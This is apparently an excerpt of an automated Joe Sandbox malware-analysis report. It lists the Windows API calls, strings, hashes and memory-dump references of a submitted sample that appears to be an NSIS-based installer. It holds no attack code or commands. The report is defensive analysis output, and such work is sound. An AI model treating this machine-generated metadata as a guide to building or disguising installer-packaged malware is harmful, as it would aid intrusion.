                                                                                                                                                                                                                                                                                      • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                      • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
• Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
• Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
• Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
APIs
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
• CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
Memory Dump Source
• Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
• Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
• Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
• Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
• Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
APIs
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Memory Dump Source
• Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
• Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
• Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
• Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                      • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                      • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                      • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                      • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                      • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                      • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                      • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                      • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                      • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                      • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID: F$A
                                                                                                                                                                                                                                                                                      • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                      • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                      • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                      • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                      • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                      • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                      • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                      • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                      • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                      • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
Similarity
• API ID: CreateInstance
• String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
• API String ID: 542301482-1377821865
APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
• lstrlenW.KERNEL32(?), ref: 004063F8
• GetVersionExW.KERNEL32(?), ref: 00406456
